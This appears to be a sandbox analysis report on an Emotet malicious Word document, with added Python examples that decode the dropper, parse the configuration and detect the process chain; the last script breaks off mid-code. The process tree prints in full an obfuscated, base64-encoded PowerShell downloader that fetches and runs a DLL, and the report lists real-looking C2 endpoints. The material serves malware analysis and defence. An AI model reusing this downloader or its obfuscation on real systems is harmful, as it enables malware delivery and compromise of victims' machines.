
Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name: ARCH_25_012021.doc
Analysis ID: 344852
MD5: baedc37e68b58765fa52c73d0fd2c2d5
SHA1: 2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256: 94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2408 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2516 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2296 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1552 cmdline: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2304 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2748 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2728 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2876 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2492 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
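The cmd.exe and powershell.exe entries above stack three cheap obfuscation layers: cmd caret escaping (`p^owe^rs^he^ll^`), the `-enc` wrapper (base64 of UTF-16LE), and a download list built from `('a'+'b')` fragments whose scheme is hidden behind a decoy token that `.replace` swaps for `http` before `.split` on `!`. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code. Its test input is constructed: the first two of the seven dropper URLs, re-typed in the sample's own concatenation style, once with `'http'` and `'!'` as literals and once built from variables the way the real script does it. In the variable case the decoder falls back to three assumptions taken from this sample: the placeholder is whatever precedes the first `://`, the real scheme is `http`, and entries are separated by `!`.

```python
"""Peel the cmd.exe -> powershell -enc -> concatenated-string layers seen in
the process tree above and recover the dropper URL list."""
import base64
import re


def uncaret(cmd: str) -> str:
    """Undo cmd.exe caret escaping: m^s^g -> msg, p^owe^rs^he^ll^ -> powershell, ^^ -> ^."""
    return re.sub(r"\^(.)?", lambda m: m.group(1) or "", cmd, flags=re.S)


def decode_enc(cmdline: str) -> str:
    """Take the base64 after -e/-ec/-enc/-EncodedCommand and decode it as UTF-16LE."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        raise ValueError("no encoded command on this command line")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


LIT = r"'([^']*)'"
CONCAT = re.compile(LIT + r"\s*\+\s*" + LIT)                 # 'a'+'b'
PAREN = re.compile(r"(?<![\w\"\]])\(\s*" + LIT + r"\s*\)")   # ('a') that is not a call


def fold_strings(src: str) -> str:
    """Collapse 'a'+'b' and ('a') into one literal until a fixed point, after
    dropping the backticks PowerShell ignores inside "r`ePlA`cE"-style method names."""
    src = re.sub(r'"([^"]*)"\(', lambda m: m.group(1).replace("`", "") + "(", src)
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", src)
        src = PAREN.sub(lambda m: f"'{m.group(1)}'", src)
    return src


URL_CHAIN = re.compile(
    r"'([^']*)'\.replace\('([^']*)',\s*'([^']*)'\)\.split\('([^']*)'\)", re.I)
SCHEME_LIT = re.compile(r"'([^']*://[^']*)'")


def extract_urls(ps_source: str, sep: str = "!") -> list:
    """Evaluate <blob>.replace(old, new).split(sep). When the arguments are not
    literals (the real script builds 'http' and '!' from variables) assume the
    placeholder is the text before the first '://', the scheme is http and the
    separator is `sep`; all three are assumptions taken from this sample."""
    folded = fold_strings(ps_source)
    m = URL_CHAIN.search(folded)
    if m:
        blob, old, new, sep = m.groups()
    else:
        m = SCHEME_LIT.search(folded)
        if not m:
            return []
        blob = m.group(1)
        old, new = blob.split("://", 1)[0], "http"
    return [u for u in blob.replace(old, new).split(sep) if u]


def recover_urls(cmdline: str) -> list:
    """cmd.exe command line, carets and all -> list of dropper URLs."""
    return extract_urls(decode_enc(uncaret(cmdline)))


# Constructed test input: the first two of the seven URLs, re-typed in the
# sample's ('a'+'b') style. SAMPLE_PS passes 'http' and '!' as literals;
# SAMPLE_PS_VARS builds them from variables as the real script does.
_BLOB = ("$Ta1ysp4=(('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'"
         "+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')"
         "+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')"
         "+('r'+'8M/'))")
SAMPLE_PS = _BLOB + ".\"r`ePlA`cE\"((('ns'+' ')+('wu d'+'b ')+'nd'),'http').\"Sp`liT\"('!');"
SAMPLE_PS_VARS = (_BLOB + ".\"r`ePlA`cE\"((('ns'+' ')+('wu d'+'b ')+'nd'),$K1iuxxp)"
                  ".\"Sp`liT\"($D54S + $Ko3ac63 + $F08J);")


def _encode(ps: str) -> str:
    """Wrap a script the way the macro did: caret-mangled launcher + -enc base64(UTF-16LE)."""
    return "p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + base64.b64encode(ps.encode("utf-16-le")).decode()


SAMPLE_CMD = _encode(SAMPLE_PS)
SAMPLE_CMD_VARS = _encode(SAMPLE_PS_VARS)

if __name__ == "__main__":
    print(fold_strings(decode_enc(uncaret(SAMPLE_CMD))))
    for url in recover_urls(SAMPLE_CMD_VARS):
        print(url)
```

On the full `-enc` payload from the tree, `fold_strings` yields the readable script (the `[tYPE]("{1}{3}{0}{4}{2}" -F ...)` format-operator tricks are left alone, they only hide type names) and, because the replace and split arguments there are variables, `extract_urls` takes the fallback path and returns the seven URLs listed later under "Potential dropper URLs found in powershell memory".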

Malware Configuration

Threatname: Emotet

{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
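The extracted configuration is a plain JSON object: a list of `ip:port` C2 endpoints and a base64 DER SubjectPublicKeyInfo. The script below, an added example rather than anything from the report or the sample, turns that into something an analyst can check: it splits the C2 list into (ip, port) pairs, reads the modulus size and public exponent out of the key with a minimal ASN.1 TLV reader (standard library only), and marks which configured endpoints the sandbox actually reached according to the Snort alerts further down. The C2 list in the embedded JSON is cut to six entries to keep the example short; the key is the complete value printed above, and the set of observed destinations is constructed from the four Snort lines.

```python
"""Work through the extracted Emotet configuration above: C2 pairs, RSA key
parameters from the DER SubjectPublicKeyInfo, and which C2s were contacted."""
import base64
import json
from collections import Counter

# Constructed test input: the configuration printed above with the C2 list cut
# to six entries; the RSA key is the complete value from the report.
CONFIG_JSON = r'''{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080",
  "217.160.169.110:8080", "185.183.16.47:80", "185.94.252.27:443",
  "143.0.85.206:7080"],
 "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}'''

# Destinations taken from the four Snort alerts in the Networking section (constructed set).
OBSERVED = {("84.232.229.24", 80), ("51.255.203.164", 8080),
            ("217.160.169.110", 8080), ("185.183.16.47", 80)}

RSA_OID = bytes.fromhex("06092a864886f70d010101")   # OID 1.2.840.113549.1.1.1 rsaEncryption


def der_tlv(buf: bytes, pos: int = 0):
    """Read one DER tag-length-value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def rsa_spki_params(b64: str):
    """(modulus_bits, exponent) from a base64 SubjectPublicKeyInfo that holds an RSA key."""
    der = base64.b64decode("".join(b64.split()))   # the config stores the key with embedded newlines
    tag, spki, _ = der_tlv(der)                    # SEQUENCE { AlgorithmIdentifier, BIT STRING }
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, alg, pos = der_tlv(spki)
    if not alg.startswith(RSA_OID):
        raise ValueError("algorithm is not rsaEncryption")
    tag, bits, _ = der_tlv(spki, pos)
    if tag != 0x03 or bits[0] != 0:                # BIT STRING; first byte = count of unused bits
        raise ValueError("unexpected subjectPublicKey encoding")
    _, rsa, _ = der_tlv(bits[1:])                  # RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER }
    _, n, pos = der_tlv(rsa)
    _, e, _ = der_tlv(rsa, pos)
    return int.from_bytes(n, "big").bit_length(), int.from_bytes(e, "big")


def parse_c2(cfg: dict) -> list:
    """'ip:port' strings -> (ip, int port) tuples, in the order the config lists them."""
    return [(ip, int(port)) for ip, port in (s.rsplit(":", 1) for s in cfg["C2 list"])]


def summarize(config_json: str, observed=frozenset()) -> dict:
    """Parse the config and report C2 pairs, port spread, contacted C2s and key parameters."""
    cfg = json.loads(config_json)
    c2 = parse_c2(cfg)
    bits, e = rsa_spki_params(cfg["RSA Public Key"])
    return {
        "c2": c2,
        "ports": Counter(port for _, port in c2),
        "contacted": [entry for entry in c2 if entry in observed],
        "rsa_bits": bits,
        "rsa_exponent": e,
    }


if __name__ == "__main__":
    s = summarize(CONFIG_JSON, OBSERVED)
    print(f"{len(s['c2'])} C2 entries, ports {dict(s['ports'])}")
    print(f"RSA-{s['rsa_bits']} public key, e={s['rsa_exponent']}")
    print("contacted in sandbox:", s["contacted"])
```

The key in this configuration decodes to a 768-bit RSA modulus with exponent 65537; the DER walk is the same for any SubjectPublicKeyInfo, so the function applies unchanged to keys pulled from other configs of this family.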

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(19 entries in total; first five shown)

Unpacked PEs

Source | Rule | Description | Author
9.2.rundll32.exe.210000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
14.2.rundll32.exe.740000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
12.2.rundll32.exe.1b0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
11.2.rundll32.exe.750000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
11.2.rundll32.exe.2a0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(27 entries in total; first five shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: (empty), Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2748, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2728
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started; Author: Florian Roth, Markus Neis; Data: Command: powershell -w hidden -enc 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
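The two Sigma matches above cover the `rundll32 ...,#1` ordinal call and the `-enc` PowerShell launch. Two further patterns are visible in the process tree but not matched by a listed rule: an Office process spawning cmd.exe, and rundll32 being handed modules whose names do not end in `.dll` (`zrfn.shd`, `aridm.cve`, `qwodoyj.whn`) from freshly created SysWOW64 subfolders. The script below is an added example of that detection logic, not the report's or the Sigma rules' own text, run over constructed Sysmon-style process-creation events rebuilt from the PIDs and command lines the tree lists. The base64 is shortened to a prefix, and the image paths for cmd.exe and powershell.exe are assumptions (the tree prints only their command lines; the powershell path is the one the report shows elsewhere).

```python
"""Process-creation detections for the chain in the process tree above, run over
constructed Sysmon EventID 1 style events rebuilt from the report's command lines."""
import re

WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"                                   # assumed image path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"      # path as printed in the report
RUNDLL64 = r"C:\Windows\system32\rundll32.exe"
RUNDLL32 = r"C:\Windows\SysWOW64\rundll32.exe"
B64 = "UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgA"  # prefix only

# Constructed events: PIDs, parents and command lines from the process tree above.
EVENTS = [
    {"pid": 2516, "image": CMD, "parent": WINWORD,
     "cmd": "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng "
            "to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + B64},
    {"pid": 1552, "image": PS, "parent": CMD, "cmd": "powershell -w hidden -enc " + B64},
    {"pid": 2304, "image": RUNDLL64, "parent": PS,
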